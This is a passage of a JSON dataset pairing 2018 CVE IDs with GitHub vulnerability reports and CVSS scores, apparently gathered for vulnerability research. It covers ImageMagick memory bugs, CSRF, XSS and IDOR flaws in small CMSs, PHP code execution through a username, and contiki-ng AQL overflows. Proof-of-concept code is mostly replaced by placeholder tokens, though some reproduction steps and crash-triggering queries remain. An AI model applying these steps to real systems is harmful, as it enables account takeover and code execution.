  24695. "description": "heap buffer overflow bug in APITAG private.h:. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description I used fuzz technology to fuzz the imagemagick and found a heap overflow bug. Steps to Reproduce APITAG NUMBERTAG a NUMBERTAG b NUMBERTAG fa fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG c0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG d0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa NUMBERTAG a NUMBERTAG e0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG f0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG arch $ uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Wed Jul NUMBERTAG UTC NUMBERTAG i NUMBERTAG i NUMBERTAG i NUMBERTAG APITAG Additional information: May I know whether this can be assigned with a CVE ID? APITAG",
  24696. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24697. "severity": "HIGH",
  24698. "baseScore": 8.8,
  24699. "impactScore": 5.9,
  24700. "exploitabilityScore": 2.8
  24701. },
  24702. {
  24703. "CVE_ID": "CVE-2018-16416",
  24704. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/481",
  24705. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/481",
  24706. "Repo_new": "daylightstudio/fuel-cms",
  24707. "Issue_Created_At": "2018-08-27T23:57:21Z",
  24708. "description": "Cross site request forgery (CSRF) vulnerability. Cross site request forgery (CSRF) vulnerability in \" URLTAG \" in FUELCMS NUMBERTAG allows remote attackers to hijack the authentication of unspecified users for requests that change administrator's password poc\uff1a CODETAG",
  24709. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24710. "severity": "HIGH",
  24711. "baseScore": 8.8,
  24712. "impactScore": 5.9,
  24713. "exploitabilityScore": 2.8
  24714. },
  24715. {
  24716. "CVE_ID": "CVE-2018-16435",
  24717. "Issue_Url_old": "https://github.com/mm2/Little-CMS/issues/171",
  24718. "Issue_Url_new": "https://github.com/mm2/little-cms/issues/171",
  24719. "Repo_new": "mm2/little-cms",
  24720. "Issue_Created_At": "2018-08-14T01:36:36Z",
  24721. "description": "Heap Buffer Overflow in APITAG VULNERABILITY DETAILS I have audited source code of lcms library and I have found a vulnerability in APITAG FILETAG FILETAG FILETAG function (cmscgats.c). The attached it8 could crash lcms when ASAN was enabled on Linux. ERRORTAG if APITAG is NUMBERTAG and APITAG is NUMBERTAG APITAG is larger than the maximum representable value NUMBERTAG ffffffff). The result of an overflow is that the least significant representable bits of the result are stored. Data will point to a small memory region and cannot be used to store large data. REPRODUCTION CASE Following code will trigger crash CODETAG ASAN Log: ERRORTAG PATCH ERRORTAG I have checked the latest version of LCMS. The vulnerability still exists. URLTAG",
  24722. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24723. "severity": "MEDIUM",
  24724. "baseScore": 5.5,
  24725. "impactScore": 3.6,
  24726. "exploitabilityScore": 1.8
  24727. },
  24728. {
  24729. "CVE_ID": "CVE-2018-16447",
  24730. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/12",
  24731. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/12",
  24732. "Repo_new": "philippe/frogcms",
  24733. "Issue_Created_At": "2018-08-10T05:48:34Z",
  24734. "description": "There is a CSRF in page URLTAG FILETAG I wrote a test script for CSRF. APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG Success\uff01\uff01\uff01 FILETAG",
  24735. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24736. "severity": "HIGH",
  24737. "baseScore": 8.8,
  24738. "impactScore": 5.9,
  24739. "exploitabilityScore": 2.8
  24740. },
  24741. {
  24742. "CVE_ID": "CVE-2018-16448",
  24743. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/1",
  24744. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/1",
  24745. "Repo_new": "chshcms/cscms",
  24746. "Issue_Created_At": "2018-08-10T13:50:34Z",
  24747. "description": "There is a CSRF vulnerability that creates vip members and administrators, and it can also modify administrator's passwords and authenticate vip members. First: Create a member FILETAG FILETAG second\uff1a authenticate vip members. FILETAG FILETAG third: Create a super administrator and web editor. FILETAG FILETAG",
  24748. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24749. "severity": "HIGH",
  24750. "baseScore": 8.8,
  24751. "impactScore": 5.9,
  24752. "exploitabilityScore": 2.8
  24753. },
  24754. {
  24755. "CVE_ID": "CVE-2018-16449",
  24756. "Issue_Url_old": "https://github.com/liu21st/onethink/issues/37",
  24757. "Issue_Url_new": "https://github.com/liu21st/onethink/issues/37",
  24758. "Repo_new": "liu21st/onethink",
  24759. "Issue_Created_At": "2018-08-24T11:43:02Z",
  24760. "description": "There are three CSRF vulnerabilities that can add pages to the website home page. After the Administrator logged in, open the following two pages. poc: FILETAG add a page to the website home page and can jump to a designated website. CODETAG FILETAG add a blog and through the audit. CODETAG FILETAG FILETAG FILETAG FILETAG",
  24761. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  24762. "severity": "MEDIUM",
  24763. "baseScore": 6.5,
  24764. "impactScore": 3.6,
  24765. "exploitabilityScore": 2.8
  24766. },
  24767. {
  24768. "CVE_ID": "CVE-2018-16458",
  24769. "Issue_Url_old": "https://github.com/baigoStudio/baigoCMS/issues/5",
  24770. "Issue_Url_new": "https://github.com/baigostudio/baigocms/issues/5",
  24771. "Repo_new": "baigostudio/baigocms",
  24772. "Issue_Created_At": "2018-09-04T07:31:52Z",
  24773. "description": "Cross site request forgery (CSRF) vulnerability. Cross site request forgery (CSRF) vulnerability in \" URLTAG \" in APITAG NUMBERTAG Can publish articles at will poc: APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG",
  24774. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  24775. "severity": "MEDIUM",
  24776. "baseScore": 6.5,
  24777. "impactScore": 3.6,
  24778. "exploitabilityScore": 2.8
  24779. },
  24780. {
  24781. "CVE_ID": "CVE-2018-16468",
  24782. "Issue_Url_old": "https://github.com/flavorjones/loofah/issues/154",
  24783. "Issue_Url_new": "https://github.com/flavorjones/loofah/issues/154",
  24784. "Repo_new": "flavorjones/loofah",
  24785. "Issue_Created_At": "2018-10-27T19:06:55Z",
  24786. "description": "placeholder security vulnerability.",
  24787. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  24788. "severity": "MEDIUM",
  24789. "baseScore": 5.4,
  24790. "impactScore": 2.7,
  24791. "exploitabilityScore": 2.3
  24792. },
  24793. {
  24794. "CVE_ID": "CVE-2018-16515",
  24795. "Issue_Url_old": "https://github.com/matrix-org/synapse/issues/3796",
  24796. "Issue_Url_new": "https://github.com/matrix-org/synapse/issues/3796",
  24797. "Repo_new": "matrix-org/synapse",
  24798. "Issue_Created_At": "2018-09-05T15:32:49Z",
  24799. "description": "CVETAG . This is a placeholder for the security issues identified by CVETAG CVETAG .",
  24800. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  24801. "severity": "HIGH",
  24802. "baseScore": 8.8,
  24803. "impactScore": 5.9,
  24804. "exploitabilityScore": 2.8
  24805. },
  24806. {
  24807. "CVE_ID": "CVE-2018-16548",
  24808. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/58",
  24809. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/58",
  24810. "Repo_new": "gdraheim/zziplib",
  24811. "Issue_Created_At": "2018-09-05T07:47:08Z",
  24812. "description": "There are memory leaks in zziplib NUMBERTAG which is triggered in APITAG APITAG There are memory leaks in zziplib NUMBERTAG which is triggered in APITAG APITAG I wrote a demo based on the documentation. CODETAG when I use [( URLTAG memory leak happened ERRORTAG It seems hdr0 isn't freed correctly in some cases.",
  24813. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24814. "severity": "MEDIUM",
  24815. "baseScore": 6.5,
  24816. "impactScore": 3.6,
  24817. "exploitabilityScore": 2.8
  24818. },
  24819. {
  24820. "CVE_ID": "CVE-2018-16551",
  24821. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/259",
  24822. "Issue_Url_new": "https://github.com/lavalite/cms/issues/259",
  24823. "Repo_new": "lavalite/cms",
  24824. "Issue_Created_At": "2018-09-04T02:44:50Z",
  24825. "description": "find.",
  24826. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  24827. "severity": "MEDIUM",
  24828. "baseScore": 5.4,
  24829. "impactScore": 2.7,
  24830. "exploitabilityScore": 2.3
  24831. },
  24832. {
  24833. "CVE_ID": "CVE-2018-16604",
  24834. "Issue_Url_old": "https://github.com/dignajar/nibbleblog/issues/131",
  24835. "Issue_Url_new": "https://github.com/dignajar/nibbleblog/issues/131",
  24836. "Repo_new": "dignajar/nibbleblog",
  24837. "Issue_Created_At": "2018-09-06T10:05:20Z",
  24838. "description": "someone can getshell with admin's password. It allows Remote Code execution by changing username to PHP code. (for APITAG Consequently, an attacker can execute arbitrary PHP code by changing username. The reason is because the username is surrounded by double quotes NUMBERTAG username is \"admin\" CODETAG NUMBERTAG username change to APITAG ( URLTAG FILETAG APITAG FILETAG",
  24839. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  24840. "severity": "HIGH",
  24841. "baseScore": 7.2,
  24842. "impactScore": 5.9,
  24843. "exploitabilityScore": 1.2
  24844. },
  24845. {
  24846. "CVE_ID": "CVE-2018-16608",
  24847. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/453",
  24848. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/453",
  24849. "Repo_new": "monstra-cms/monstra",
  24850. "Issue_Created_At": "2018-08-16T12:55:51Z",
  24851. "description": "Insecure direct object reference. FILETAG Vulnerable URL: ' URLTAG Hello sir, I have found a Insecure Direct Object Reference vulnerability in Monstra NUMBERTAG in the vulnerable URL page. Here I was able to change the password of an administrator user while being authenticated a user with APITAG role by changing the 'user_id' parameter to that of the target user. I have prepared and attached a doc with details of the vulnerability and steps to reproduce.",
  24852. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  24853. "severity": "HIGH",
  24854. "baseScore": 8.8,
  24855. "impactScore": 5.9,
  24856. "exploitabilityScore": 2.8
  24857. },
  24858. {
  24859. "CVE_ID": "CVE-2018-16622",
  24860. "Issue_Url_old": "https://github.com/doramart/DoraCMS/issues/136",
  24861. "Issue_Url_new": "https://github.com/doramart/doracms/issues/136",
  24862. "Repo_new": "doramart/doracms",
  24863. "Issue_Created_At": "2018-04-18T01:56:08Z",
  24864. "description": "There is an XSS vulnerability here. After logging in to individual users, go to URLTAG Insert XSS payload in \u6458\u8981 and \u8be6\u60c5, publish; FILETAG The POC request is: FILETAG At URLTAG Pop up a web page window FILETAG Log in to the administrator demo account and go to the APITAG is test, please detele\u201d edit. Click 'XSS' to pop up a web page FILETAG",
  24865. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  24866. "severity": "MEDIUM",
  24867. "baseScore": 5.4,
  24868. "impactScore": 2.7,
  24869. "exploitabilityScore": 2.3
  24870. },
  24871. {
  24872. "CVE_ID": "CVE-2018-16636",
  24873. "Issue_Url_old": "https://github.com/NucleusCMS/NucleusCMS/issues/84",
  24874. "Issue_Url_new": "https://github.com/nucleuscms/nucleuscms/issues/84",
  24875. "Repo_new": "nucleuscms/nucleuscms",
  24876. "Issue_Created_At": "2018-08-21T05:43:03Z",
  24877. "description": "HTML Injection in Nucleus CMS NUMBERTAG Affected software: Nucleus CMS NUMBERTAG Type of vulnerability: HTML Injection Discovered by: Provensec Website: FILETAG Author: Balvinder Singh Description: HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. Proof of concept: Step1: Login to the nucleus cms. Step2: URL: URLTAG Here the body parameter is vulnerable to HTML Injection. FILETAG Step3: Here the HTML injection got executed for body parameter. URL: URLTAG FILETAG",
  24878. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  24879. "severity": "MEDIUM",
  24880. "baseScore": 6.5,
  24881. "impactScore": 3.6,
  24882. "exploitabilityScore": 2.8
  24883. },
  24884. {
  24885. "CVE_ID": "CVE-2018-16640",
  24886. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1201",
  24887. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1201",
  24888. "Repo_new": "imagemagick/imagemagick",
  24889. "Issue_Created_At": "2018-07-06T12:20:04Z",
  24890. "description": "Potential memory leak in function APITAG in coders/png.c. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There is a potential memory leak vulnerability in APITAG function in coders/png.c. ( URLTAG As we can see, when chunk equals to NULL APITAG NUMBERTAG the program should call APITAG function firstly. Otherwise, there would be a memory leak vulnerability. Line NUMBERTAG Line NUMBERTAG and Line NUMBERTAG Line NUMBERTAG are the correct way to handle this condition. ERRORTAG APITAG version: current version APITAG version)",
  24891. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24892. "severity": "MEDIUM",
  24893. "baseScore": 6.5,
  24894. "impactScore": 3.6,
  24895. "exploitabilityScore": 2.8
  24896. },
  24897. {
  24898. "CVE_ID": "CVE-2018-16642",
  24899. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1162",
  24900. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1162",
  24901. "Repo_new": "imagemagick/imagemagick",
  24902. "Issue_Created_At": "2018-06-01T06:37:39Z",
  24903. "description": "There is a potential out of bound write bug in function APITAG APITAG Prerequisites Y] I have written a descriptive issue title [ Y] I have verified that I am using the latest version of APITAG [ Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There is a vulnerability named CVETAG . Below is the detailed information about the vulnerability. DESCRIPTION of CVETAG coders/wpg.c in APITAG allows remote attackers to cause a denial of service (out of bounds write) via a crafted file. ISSUE of CVETAG NUMBERTAG PATCH of CVETAG URLTAG URLTAG As we can see from the patch information, there was a fix in APITAG in coders/wpg.c. And it is similar to APITAG in coders/cuts.c. APITAG ( URLTAG ERRORTAG URLTAG APITAG ( FILETAG So, I think there should be a fix in APITAG in coders/cut.c. Steps to Reproduce APITAG System Configuration APITAG APITAG version: Environment APITAG system, version and so on): Additional information: APITAG",
  24904. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24905. "severity": "MEDIUM",
  24906. "baseScore": 6.5,
  24907. "impactScore": 3.6,
  24908. "exploitabilityScore": 2.8
  24909. },
  24910. {
  24911. "CVE_ID": "CVE-2018-16643",
  24912. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1199",
  24913. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1199",
  24914. "Repo_new": "imagemagick/imagemagick",
  24915. "Issue_Created_At": "2018-07-05T03:29:31Z",
  24916. "description": "Missing check for fputc function in multiple files.. Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There are NUMBERTAG functions APITAG APITAG APITAG APITAG that miss check for fputc function. As issued in NUMBERTAG And patch for NUMBERTAG is APITAG I think there should be add status flag when \"fputc(c, file) != c\". APITAG version: latest version",
  24917. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24918. "severity": "MEDIUM",
  24919. "baseScore": 6.5,
  24920. "impactScore": 3.6,
  24921. "exploitabilityScore": 2.8
  24922. },
  24923. {
  24924. "CVE_ID": "CVE-2018-16644",
  24925. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1269",
  24926. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1269",
  24927. "Repo_new": "imagemagick/imagemagick",
  24928. "Issue_Created_At": "2018-08-27T09:14:39Z",
  24929. "description": "Missing check for length in function APITAG of coders/dcm.c and function APITAG of coders/pict.c. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There are two missing check for variable length. ERRORTAG (coders/dcm.c) ERRORTAG (coders/pict.c) In my opinion, we should check whether length is bigger than APITAG or not. If condition APITAG satisfies, we should throw exception like ERRORTAG . APITAG version: latest version APITAG",
  24930. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24931. "severity": "MEDIUM",
  24932. "baseScore": 6.5,
  24933. "impactScore": 3.6,
  24934. "exploitabilityScore": 2.8
  24935. },
  24936. {
  24937. "CVE_ID": "CVE-2018-16645",
  24938. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1268",
  24939. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1268",
  24940. "Repo_new": "imagemagick/imagemagick",
  24941. "Issue_Created_At": "2018-08-27T08:59:26Z",
  24942. "description": "Potential Out of memory in function APITAG of coders/bmp.c and APITAG of codes/dib.c.. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There are two missing check for number_colors in function APITAG of coders/bmp.c and APITAG of codes/dib.c, which may lead to out of memory vulnerability. CODETAG ERRORTAG The patch for bmp and dib is similar. Below is the proposal patch for bmp.c. ERRORTAG APITAG version: latest version APITAG",
  24943. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24944. "severity": "MEDIUM",
  24945. "baseScore": 6.5,
  24946. "impactScore": 3.6,
  24947. "exploitabilityScore": 2.8
  24948. },
  24949. {
  24950. "CVE_ID": "CVE-2018-16663",
  24951. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/599",
  24952. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/599",
  24953. "Repo_new": "contiki-ng/contiki-ng",
  24954. "Issue_Created_At": "2018-07-09T16:47:47Z",
  24955. "description": "Stack based buffer overflow while parsing AQL (storage of relations). Macro AQL_ADD_RELATION write data into stack based fixed size buffer named relations without any check on number and sizes of added relations. Buffer is declared as: APITAG struct aql_adt { char APITAG NUMBERTAG db APITAG define AQL_RELATION_LIMIT NUMBERTAG db APITAG define RELATION_NAME_LENGTH NUMBERTAG usage: APITAG define AQL_ADD_RELATION(adt, rel) \\ strcpy((adt) >relations[(adt) >relation_count++], (rel)) Following AQL code samples will trigger crash: SELECT t FROM APITAG This could lead to Remote Code Execution via stack smashing attack (overwriting the function return address). Please take a note, that before going over the whole aql_adt structure firstly other values in the struct are overwritten, which may produce other integrity issues. The risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG critical) Mitigation: Before adding relation to the struct the size of new relation and the number of already stored relations should be checked. 
Please take a look at patch fixing this issue in APITAG (using antelope engine as arastorage): FILETAG FILETAG Crash details using Address Sanitizer: APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffc8fd NUMBERTAG f NUMBERTAG at pc NUMBERTAG f NUMBERTAG e3d NUMBERTAG bp NUMBERTAG ffc8fd NUMBERTAG sp NUMBERTAG ffc8fd NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffc8fd NUMBERTAG f NUMBERTAG thread T NUMBERTAG f NUMBERTAG e3d NUMBERTAG PATHTAG NUMBERTAG e NUMBERTAG d in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG f7 in parse_relations PATHTAG NUMBERTAG f7 in parse_relations PATHTAG NUMBERTAG f7 in parse_select PATHTAG NUMBERTAG in aql_parse PATHTAG NUMBERTAG e in main PATHTAG NUMBERTAG f NUMBERTAG dfc NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffc8fd NUMBERTAG f NUMBERTAG is located in 
stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG bf in main PATHTAG This frame has NUMBERTAG object(s NUMBERTAG parsed_aql' APITAG NUMBERTAG fa6fe NUMBERTAG f4]f4 f4 f3 f3 f3 f NUMBERTAG fa6ff NUMBERTAG fa NUMBERTAG fa NUMBERTAG fa NUMBERTAG fa NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  24956. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  24957. "severity": "HIGH",
  24958. "baseScore": 7.8,
  24959. "impactScore": 5.9,
  24960. "exploitabilityScore": 1.8
  24961. },
  24962. {
  24963. "CVE_ID": "CVE-2018-16664",
  24964. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/596",
  24965. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/596",
  24966. "Repo_new": "contiki-ng/contiki-ng",
  24967. "Issue_Created_At": "2018-07-09T14:58:52Z",
  24968. "description": "Global buffer overflow while parsing AQL (lvm_set_op, lvm_set_relation, lvm_set_operand). Functions lvm_set_op, lvm_set_relation, lvm_set_operand try to memcpy input data (part of AQL files) into fixed size buffer lvm_instance_t >vmcode. Allocated buffer can fit only DB_VM_BYTECODE_SIZE NUMBERTAG bytes and the check is missing. Declaration: db APITAG define DB_VM_BYTECODE_SIZE NUMBERTAG aql APITAG static unsigned char vmcode[DB_VM_BYTECODE_SIZE]; This could potentially lead to Remote Code Execution, but attack is more difficult, because buffer is stored in global data segment and buffer is filled with bytecode, not directly by user provided data APITAG APITAG The risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG high) Following AQL code samples will trigger crash: APITAG REMOVE FROM aaa WHERE a NUMBERTAG COUNT a INLINE a TYPE NUMBERTAG a / APITAG NUMBERTAG bb NUMBERTAG f9]f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  24969. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  24970. "severity": "HIGH",
  24971. "baseScore": 7.0,
  24972. "impactScore": 5.9,
  24973. "exploitabilityScore": 1.0
  24974. },
  24975. {
  24976. "CVE_ID": "CVE-2018-16665",
  24977. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/598",
  24978. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/598",
  24979. "Repo_new": "contiki-ng/contiki-ng",
  24980. "Issue_Created_At": "2018-07-09T15:09:23Z",
  24981. "description": "Global buffer overflow while parsing AQL (lvm_shift_for_operator). Function APITAG write data into global fixed size buffer named vmcode, with wrong size check. Buffer is declared as: db APITAG define DB_VM_BYTECODE_SIZE NUMBERTAG aql APITAG static unsigned char vmcode[DB_VM_BYTECODE_SIZE]; Following line (at lvm.c line NUMBERTAG moves the data by (sizeof(operator_t) + sizeof(node_type_t)) bytes to the right: memmove(ptr + sizeof(operator_t) + sizeof(node_type_t), ptr, old_end end); while following check (at lvm.c line NUMBERTAG adds only sizeof(operator_t): if(p >end + sizeof(operator_t) > p >size || end >= old_end) Following AQL code samples will trigger crash: SELECT a from a WHERE NUMBERTAG This buffer overflow is not likely to lead to Remote Code Execution, because size of overflow is only NUMBERTAG bytes. Therefore it is possible to only to crash the AQL engine or manipulate the data in other buffers, this leads to risk reduction APITAG APITAG APITAG Additionaly the risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. 
Proposed CVSS score: PATHTAG NUMBERTAG Medium) Mitigation: Following check (at line NUMBERTAG if(p >end + sizeof(operator_t) > p >size || end >= old_end) should be changed to: if(p >end + sizeof(operator_t) + sizeof(node_type_t) > p >size || end >= old_end) Crash details using Address Sanitizer NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG c NUMBERTAG at pc NUMBERTAG f NUMBERTAG d NUMBERTAG e NUMBERTAG bp NUMBERTAG ffe1f NUMBERTAG d0 sp NUMBERTAG ffe1f NUMBERTAG a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG c NUMBERTAG thread T NUMBERTAG f NUMBERTAG d NUMBERTAG e NUMBERTAG in __asan_memmove ( PATHTAG NUMBERTAG in lvm_shift_for_operator PATHTAG NUMBERTAG a in parse_expr PATHTAG NUMBERTAG in parse_expr PATHTAG NUMBERTAG a4 in parse_comparison PATHTAG NUMBERTAG ERRORTAG NUMBERTAG b in parse_where PATHTAG NUMBERTAG ERRORTAG NUMBERTAG b in parse_select PATHTAG NUMBERTAG b NUMBERTAG in aql_parse PATHTAG NUMBERTAG c1 in main PATHTAG NUMBERTAG f NUMBERTAG ccca NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG c NUMBERTAG is located NUMBERTAG bytes to the left of global variable 'p' defined in 'aql APITAG NUMBERTAG c0a0) of size 